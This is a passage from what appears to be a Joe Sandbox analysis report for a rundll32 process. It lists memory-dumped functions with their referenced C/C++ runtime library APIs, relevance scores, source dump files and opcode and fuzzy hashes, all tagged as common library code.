std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A2C3D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A2C62
messages.LIBCPMT ref: 000001E5190A2CE5
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A2CFC
_CxxThrowException.LIBCMT ref: 000001E5190A2D0D
std::_Facet_Register.LIBCPMT ref: 000001E5190A2D2B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID:
API String ID: 620047600-0
Opcode ID: e02caa4fb9f9f2feb070e3db7e870884112d88562d0c71a5ab28d0eb569987ff
Instruction ID: 42fb11aa2b909e6835842ef82dae62638310d76c6933a8940ab0ee83ccdd83eb
Opcode Fuzzy Hash: e02caa4fb9f9f2feb070e3db7e870884112d88562d0c71a5ab28d0eb569987ff
Instruction Fuzzy Hash: 70418231209E598FE754EB18D4947EE73F2FBA8314F54067EA44AC31A6CA34D845C782

Function 000001E51AE18864 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001E51AE18896

Part of subcall function 000001E51AE13B7C: _getptd.LIBCMT ref: 000001E51AE13B92
Part of subcall function 000001E51AE13B7C: __updatetlocinfo.LIBCMT ref: 000001E51AE13BC7
Part of subcall function 000001E51AE13B7C: __updatetmbcinfo.LIBCMT ref: 000001E51AE13BEE

_malloc_crt.LIBCMT ref: 000001E51AE188E1
_invoke_watson.LIBCMT ref: 000001E51AE189C9

Part of subcall function 000001E51AE1A508: _call_reportfault.LIBCMT ref: 000001E51AE1A530

_invoke_watson.LIBCMT ref: 000001E51AE189DE

Strings

:, xrefs: 000001E51AE188FF

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Locale_invoke_watson$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_call_reportfault_getptd_malloc_crt
String ID: :
API String ID: 1584724053-336475711
Opcode ID: 604a302fabdb042f4ebc9b27cedb385bdeaebfe8a2c90ea295b00d5b5a1e0000
Instruction ID: cfebf43fe8cece4037cf2228bee5fe12dc9997c58a4568cc4a6743f2b02a3fca
Opcode Fuzzy Hash: 604a302fabdb042f4ebc9b27cedb385bdeaebfe8a2c90ea295b00d5b5a1e0000
Instruction Fuzzy Hash: F341CF32724B9481EB02AB26E80579D73E6F788BC8F899625DF5D0B746DE38D412C300

Function 000001E51AE186E4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc_crt.LIBCMT ref: 000001E51AE18761
_invoke_watson.LIBCMT ref: 000001E51AE18849

Part of subcall function 000001E51AE1A508: _call_reportfault.LIBCMT ref: 000001E51AE1A530

_invoke_watson.LIBCMT ref: 000001E51AE1885E
_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001E51AE18716

Part of subcall function 000001E51AE13B7C: _getptd.LIBCMT ref: 000001E51AE13B92
Part of subcall function 000001E51AE13B7C: __updatetlocinfo.LIBCMT ref: 000001E51AE13BC7
Part of subcall function 000001E51AE13B7C: __updatetmbcinfo.LIBCMT ref: 000001E51AE13BEE

Strings

:, xrefs: 000001E51AE1877F

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Locale_invoke_watson$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_call_reportfault_getptd_malloc_crt
String ID: :
API String ID: 1584724053-336475711
Opcode ID: f6eab2cf8d0451a383fcd1094c8bc586515c01fa06371aa533fca521f759249e
Instruction ID: f8faaacb3e393c6bcbf2dc303e01c77d1dbe0547db181761d300f71a79f18620
Opcode Fuzzy Hash: f6eab2cf8d0451a383fcd1094c8bc586515c01fa06371aa533fca521f759249e
Instruction Fuzzy Hash: DD41CE32724B9481EB02AB26E80579D33E6F788BC8F899225DF4D0B786DE34D412C300

Function 000001E519095908 Relevance: 7.8, APIs: 5, Instructions: 295COMMON

Download Yara Rule

APIs

_Fgetc.LIBCPMTD ref: 000001E5190959DC

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: Fgetc
String ID:
API String ID: 1720979605-0
Opcode ID: f74a844098648da67d21de2c32495390ab1c3596fe8d82436c96308467037ff2
Instruction ID: 3f6cbd1256c00ab02c5f0b4410ba4db8d6d56501f8ee7c32eddbedcc706c9857
Opcode Fuzzy Hash: f74a844098648da67d21de2c32495390ab1c3596fe8d82436c96308467037ff2
Instruction Fuzzy Hash: 12B11E31118FC98EE7A4EB28C4557EEB3F2FB94304F44491EA88EC3192DE759985CB46

Function 000001E5190B2578 Relevance: 7.8, APIs: 5, Instructions: 265COMMON

Download Yara Rule

APIs

_Mpunct.LIBCPMT ref: 000001E5190B262F
_Mpunct.LIBCPMT ref: 000001E5190B266E
std::ios_base::getloc.LIBCPMTD ref: 000001E5190B25E3

Part of subcall function 000001E5190937E8: std::locale::locale.LIBCPMTD ref: 000001E51909380C

Part of subcall function 000001E5190A3A5C: std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3A7D
Part of subcall function 000001E5190A3A5C: std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3AA2

std::ios_base::getloc.LIBCPMTD ref: 000001E5190B26E1
_Stoulx.LIBCPMT ref: 000001E5190B271A

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: LockitLockit::_Mpunctstd::_std::ios_base::getloc$Stoulxstd::locale::locale
String ID:
API String ID: 1104148741-0
Opcode ID: 166b93a94447b86139d1c22adbbc14e30780d0c9cc7094b737ceab0ca3da017a
Instruction ID: 72e89eef24bbbc204f07008fa3a318e1b6a9e7d33678049fa1455be293c05060
Opcode Fuzzy Hash: 166b93a94447b86139d1c22adbbc14e30780d0c9cc7094b737ceab0ca3da017a
Instruction Fuzzy Hash: C9815031618E4C8FDB58EB6CD4857EEB3F2EB69705F44052DE84BD32A2DA30A8458781

Function 000001E5190B18D0 Relevance: 7.8, APIs: 5, Instructions: 264COMMON

Download Yara Rule

APIs

_Mpunct.LIBCPMT ref: 000001E5190B1987
_Mpunct.LIBCPMT ref: 000001E5190B19C6
std::ios_base::getloc.LIBCPMTD ref: 000001E5190B193B

Part of subcall function 000001E5190937E8: std::locale::locale.LIBCPMTD ref: 000001E51909380C

Part of subcall function 000001E5190A392C: std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A394D
Part of subcall function 000001E5190A392C: std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3972

std::ios_base::getloc.LIBCPMTD ref: 000001E5190B1A39
_Stoulx.LIBCPMT ref: 000001E5190B1A72

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: LockitLockit::_Mpunctstd::_std::ios_base::getloc$Stoulxstd::locale::locale
String ID:
API String ID: 1104148741-0
Opcode ID: 16286996adb80dee7d5b064b22652e5f05a5085a5d70cf9cb1c6c826df7b05ca
Instruction ID: 1e443927c61a6bd50af628ee34d603748bac5fd8e668fe604e15118aba7def43
Opcode Fuzzy Hash: 16286996adb80dee7d5b064b22652e5f05a5085a5d70cf9cb1c6c826df7b05ca
Instruction Fuzzy Hash: 64715035618E4C8FDB98EB68D4857EEB3F2FB99304F44052EE84AD3192DA30E845C781

Function 000001E5190A00C8 Relevance: 7.8, APIs: 5, Instructions: 254COMMON

Download Yara Rule

APIs

_Mpunct.LIBCPMT ref: 000001E5190A017A
_Mpunct.LIBCPMT ref: 000001E5190A01B9
std::ios_base::getloc.LIBCPMTD ref: 000001E5190A012D

Part of subcall function 000001E5190937E8: std::locale::locale.LIBCPMTD ref: 000001E51909380C

Part of subcall function 000001E51909C2AC: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51909C2CD
Part of subcall function 000001E51909C2AC: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51909C2F2

std::ios_base::getloc.LIBCPMTD ref: 000001E5190A0225
_Stoulx.LIBCPMT ref: 000001E5190A025C

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: LockitLockit::_Mpunctstd::_std::ios_base::getloc$Stoulxstd::locale::locale
String ID:
API String ID: 1104148741-0
Opcode ID: 3d88c636a073cdcdd73c6a924e436b277ebbf35aadf33963d9bcfa329ff9a495
Instruction ID: 84aea16dedce4c3a750aa38cd034a85d25d47578a14059517215200441a28cd0
Opcode Fuzzy Hash: 3d88c636a073cdcdd73c6a924e436b277ebbf35aadf33963d9bcfa329ff9a495
Instruction Fuzzy Hash: 3271AF30718E4C8FEB58EB68D4467EDB3F2EB99314F54062DE84AD3192DE60A84587C2

Function 000001E51ADE6060 Relevance: 7.7, APIs: 5, Instructions: 196COMMON

Download Yara Rule

APIs

_Fgetc.LIBCPMTD ref: 000001E51ADE6134

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Fgetc
String ID:
API String ID: 1720979605-0
Opcode ID: af233356ab44033a1af5434a4fe9d0445c43cbdf01476d6f5b86da92ac9fc8ae
Instruction ID: 2af0fa505fb3689e584cbb010891263d9ac11704ccd3a48aa1d75881cc0638fc
Opcode Fuzzy Hash: af233356ab44033a1af5434a4fe9d0445c43cbdf01476d6f5b86da92ac9fc8ae
Instruction Fuzzy Hash: 18A12372209EC084EB62DB25F4513EEB3E2E7D5748F504125EA8D47A9BEF78C584CB40

Function 000001E51AE02028 Relevance: 7.7, APIs: 5, Instructions: 162COMMON

Download Yara Rule

APIs

_Mpunct.LIBCPMT ref: 000001E51AE020DF
_Mpunct.LIBCPMT ref: 000001E51AE0211E
std::ios_base::getloc.LIBCPMTD ref: 000001E51AE02093

Part of subcall function 000001E51ADE3F40: std::locale::locale.LIBCPMTD ref: 000001E51ADE3F64

Part of subcall function 000001E51ADF4084: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF40A5
Part of subcall function 000001E51ADF4084: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF40CA
Part of subcall function 000001E51ADF4084: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF40F4
Part of subcall function 000001E51ADF4084: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF419E

std::ios_base::getloc.LIBCPMTD ref: 000001E51AE02191
_Stoulx.LIBCPMT ref: 000001E51AE021CA

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_Mpunctstd::ios_base::getloc$Stoulxstd::locale::locale
String ID:
API String ID: 3293814644-0
Opcode ID: 1b6468ebf12914b2f0fe8338e001e18fabad8228a10c305a24cbb031952596d2
Instruction ID: 32a49e035fa0f8741a365975048ae48e6ceefbe1bac10c505547ea4f423b8257
Opcode Fuzzy Hash: 1b6468ebf12914b2f0fe8338e001e18fabad8228a10c305a24cbb031952596d2
Instruction Fuzzy Hash: 3F517932719E808AEB12DBA5E4407DE63E2F785B9CF404216EF591BB9ADE38C449C740

Function 000001E51AE02CD0 Relevance: 7.7, APIs: 5, Instructions: 162COMMON

Download Yara Rule

APIs

_Mpunct.LIBCPMT ref: 000001E51AE02D87
_Mpunct.LIBCPMT ref: 000001E51AE02DC6
std::ios_base::getloc.LIBCPMTD ref: 000001E51AE02D3B

Part of subcall function 000001E51ADE3F40: std::locale::locale.LIBCPMTD ref: 000001E51ADE3F64

Part of subcall function 000001E51ADF41B4: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF41D5
Part of subcall function 000001E51ADF41B4: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF41FA
Part of subcall function 000001E51ADF41B4: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF4224
Part of subcall function 000001E51ADF41B4: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF42CE

std::ios_base::getloc.LIBCPMTD ref: 000001E51AE02E39
_Stoulx.LIBCPMT ref: 000001E51AE02E72

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_Mpunctstd::ios_base::getloc$Stoulxstd::locale::locale
String ID:
API String ID: 3293814644-0
Opcode ID: ba231bb55e8ad13bb8c84fadf00820e2b831a140557f64e95a63da8dc5e447dc
Instruction ID: fda092c5d877cc90fd4ceacbaf8540786f59ea2d8293b202dafdd7991e771765
Opcode Fuzzy Hash: ba231bb55e8ad13bb8c84fadf00820e2b831a140557f64e95a63da8dc5e447dc
Instruction Fuzzy Hash: 11516932719E808AEB12DBA5D4407DE73F2F785B9CF404216EE5957B9ADE38C445C740

Function 000001E51ADF0820 Relevance: 7.7, APIs: 5, Instructions: 157COMMON

Download Yara Rule

APIs

_Mpunct.LIBCPMT ref: 000001E51ADF08D2
_Mpunct.LIBCPMT ref: 000001E51ADF0911
std::ios_base::getloc.LIBCPMTD ref: 000001E51ADF0885

Part of subcall function 000001E51ADE3F40: std::locale::locale.LIBCPMTD ref: 000001E51ADE3F64

Part of subcall function 000001E51ADECA04: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADECA25
Part of subcall function 000001E51ADECA04: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADECA4A
Part of subcall function 000001E51ADECA04: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADECA74
Part of subcall function 000001E51ADECA04: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADECB1E

std::ios_base::getloc.LIBCPMTD ref: 000001E51ADF097D
_Stoulx.LIBCPMT ref: 000001E51ADF09B4

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_Mpunctstd::ios_base::getloc$Stoulxstd::locale::locale
String ID:
API String ID: 3293814644-0
Opcode ID: fc64bed50a84d4864b71b968ac71fd66e0380d981a3e2c2678fe09f174b3caf6
Instruction ID: b4b88e34ceedc264ffa2adf891e430fbb2faf4c8c75e2d2e8add3018a0184109
Opcode Fuzzy Hash: fc64bed50a84d4864b71b968ac71fd66e0380d981a3e2c2678fe09f174b3caf6
Instruction Fuzzy Hash: 62519E32710F808AFB11DBA5E4407DE63F2F785BA8F445216EE591BB9AEE38C545C740

Function 000001E5190A3F1C Relevance: 7.6, APIs: 5, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3F3D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3F62
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A3FFC
_CxxThrowException.LIBCMT ref: 000001E5190A400D
std::_Facet_Register.LIBCPMT ref: 000001E5190A402B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
String ID:
API String ID: 1776536810-0
Opcode ID: 78f14f210944464f9e1e1c2a8d13bcf1eae8f7fb983aa7ce8c5333fa9df294e0
Instruction ID: 880e7450a293dd74114d3eb1f221ab52e2f57ca6817e62d0283163d5796d4a12
Opcode Fuzzy Hash: 78f14f210944464f9e1e1c2a8d13bcf1eae8f7fb983aa7ce8c5333fa9df294e0
Instruction Fuzzy Hash: F5419171119E484FE754EF18D894BEE73F2FBA8314F54066EA44AC31A6CA70E845CBC2

Function 000001E5190A3DEC Relevance: 7.6, APIs: 5, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3E0D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3E32
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A3ECC
_CxxThrowException.LIBCMT ref: 000001E5190A3EDD
std::_Facet_Register.LIBCPMT ref: 000001E5190A3EFB

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
String ID:
API String ID: 1776536810-0
Opcode ID: 8201b41f25ef33c3613c1a68ee4a65115b9c88f9471d48fa011a91e106f7afff
Instruction ID: a821e0d5e1ee9cba6e5f6ece51ce4f6711a18c99048e9be5d384b0371f4d8093
Opcode Fuzzy Hash: 8201b41f25ef33c3613c1a68ee4a65115b9c88f9471d48fa011a91e106f7afff
Instruction Fuzzy Hash: BD419631119E498FE754EB18D494BEE73F2FBA4314F58096EA41AC31E6DA70D845CBC2

Function 000001E5190B80D0 Relevance: 7.6, APIs: 5, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190B80F1

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190B8116
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190B81B0
_CxxThrowException.LIBCMT ref: 000001E5190B81C1
std::_Facet_Register.LIBCPMT ref: 000001E5190B81DF

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
String ID:
API String ID: 1776536810-0
Opcode ID: bae5d00c57f016e6d8c0dc1a7b8c8c15f75d85941c89fc877493011a6d48aa01
Instruction ID: 413401c35c27b84fffee48cdbe3c81bf3d66df6f4a0e35284860ae671c2ea16c
Opcode Fuzzy Hash: bae5d00c57f016e6d8c0dc1a7b8c8c15f75d85941c89fc877493011a6d48aa01
Instruction Fuzzy Hash: C741B231509E488FF755EB28D481BEE73F6FBA4314F58095DD80AC31B5DA34D9418B82

Function 000001E5190B8200 Relevance: 7.6, APIs: 5, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190B8221

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190B8246
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190B82E0
_CxxThrowException.LIBCMT ref: 000001E5190B82F1
std::_Facet_Register.LIBCPMT ref: 000001E5190B830F

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
String ID:
API String ID: 1776536810-0
Opcode ID: fb5e24ca2653538eeac2f84e8a1a1624b26305bbc8348ff8a181a437a36e0ba9
Instruction ID: deab46bb042d5a0a65fc80cf987b378b6a25b7780ca41a6bdc4b45b881e9e251
Opcode Fuzzy Hash: fb5e24ca2653538eeac2f84e8a1a1624b26305bbc8348ff8a181a437a36e0ba9
Instruction Fuzzy Hash: E641C330508E484FE755EB28D4C5BAD73F2FB64314F58056DA80AD32B6CA34D945CB81

Function 000001E5190A3CBC Relevance: 7.6, APIs: 5, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3CDD

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3D02
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A3D9C
_CxxThrowException.LIBCMT ref: 000001E5190A3DAD
std::_Facet_Register.LIBCPMT ref: 000001E5190A3DCB

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
String ID:
API String ID: 1776536810-0
Opcode ID: 83099b52044964ab2d8c21b0e66d69e068add0a1ffda037c7dbd6fda676a952f
Instruction ID: 5141e48bc2fa7869b88a77474c662c6629a288ed96ab1f94619b2131eb9e6b26
Opcode Fuzzy Hash: 83099b52044964ab2d8c21b0e66d69e068add0a1ffda037c7dbd6fda676a952f
Instruction Fuzzy Hash: FD41C531119E498FE764FB28E4957EE73F2FBA4314F54066EA45AC31A6CA70D805C7C2

Function 000001E5190A3B8C Relevance: 7.6, APIs: 5, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3BAD

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3BD2
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A3C6C
_CxxThrowException.LIBCMT ref: 000001E5190A3C7D
std::_Facet_Register.LIBCPMT ref: 000001E5190A3C9B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
String ID:
API String ID: 1776536810-0
Opcode ID: b9b3160839c62794a2f4426fd174e2d910c5656f38ad309ad83c3aeddb3b6001
Instruction ID: 828d3cc006a1f60b1d2b177127bb9ad4421c6a3dd71b2cf82f517ed4abd57f8c
Opcode Fuzzy Hash: b9b3160839c62794a2f4426fd174e2d910c5656f38ad309ad83c3aeddb3b6001
Instruction Fuzzy Hash: FE41B631109E898FE754EB18D8947ED73F2FB94314F54066EA44AC31A6CA74D845CB82

Function 000001E5190956C8 Relevance: 7.6, APIs: 5, Instructions: 124COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 000001E519095720
char_traits.LIBCPMTD ref: 000001E519095759
char_traits.LIBCPMTD ref: 000001E519095774
char_traits.LIBCPMTD ref: 000001E5190957A6

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: char_traits
String ID:
API String ID: 1158913984-0
Opcode ID: 138815e70514d2f135f1c707d96a860ed4914229c68fb56bc0cde8100c9a4ae3
Instruction ID: a4bd31d3e283cab9b122072194d06c1c67a2f6b069d43947a84347f743063e2c
Opcode Fuzzy Hash: 138815e70514d2f135f1c707d96a860ed4914229c68fb56bc0cde8100c9a4ae3
Instruction Fuzzy Hash: 80411A31118E868AE748EB25C4517EEB3F2FF95348F88091DED8EE71E2DA25D944C702

Function 000001E51AE1D46C Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001E51AE1D4CE
_isleadbyte_l.LIBCMT ref: 000001E51AE1D4FE
MultiByteToWideChar.KERNEL32 ref: 000001E51AE1D53D
MultiByteToWideChar.KERNEL32 ref: 000001E51AE1D58B
_errno.LIBCMT ref: 000001E51AE1D595

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
String ID:
API String ID: 2998201375-0
Opcode ID: 1d846ac782697e1626f60741b10654be5d980ecfef08fe52ee6ab297ca0a43db
Instruction ID: 77e6c5e6861cdaffa657b4546fad631a516e7588b55c3033b0b9d3a56c0cc829
Opcode Fuzzy Hash: 1d846ac782697e1626f60741b10654be5d980ecfef08fe52ee6ab297ca0a43db
Instruction Fuzzy Hash: 2141C272218BD086EB62AF15D1807AD7BE6F784B8CF144225EF895BB96DB39D8418700

Function 000001E51ADE5E20 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 000001E51ADE5E78
char_traits.LIBCPMTD ref: 000001E51ADE5EB1
char_traits.LIBCPMTD ref: 000001E51ADE5ECC
char_traits.LIBCPMTD ref: 000001E51ADE5EFE

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: char_traits
String ID:
API String ID: 1158913984-0
Opcode ID: efd17d778424b9709a2ebecd350b9a00f791cf1ba8a6ebccbfb2f640782f2fd7
Instruction ID: 5ec285f9fc996a44fee33190f0b3f67ef6b65efde666abc33e4003aecd93de97
Opcode Fuzzy Hash: efd17d778424b9709a2ebecd350b9a00f791cf1ba8a6ebccbfb2f640782f2fd7
Instruction Fuzzy Hash: 9241D136218E8180EB52E775E4513EE63F2FBD578CF900011FA8D876ABEE39C9858740

Function 000001E51AE14448 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 000001E51AE14455

Part of subcall function 000001E51AE1D224: _getptd_noexit.LIBCMT ref: 000001E51AE1D22A
Part of subcall function 000001E51AE1D224: _amsg_exit.LIBCMT ref: 000001E51AE1D23A

_inconsistency.LIBCMT ref: 000001E51AE14463

Part of subcall function 000001E51AE1EC80: DecodePointer.KERNEL32 ref: 000001E51AE1EC8B

_getptd.LIBCMT ref: 000001E51AE14468
_inconsistency.LIBCMT ref: 000001E51AE14484
_getptd.LIBCMT ref: 000001E51AE14494

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

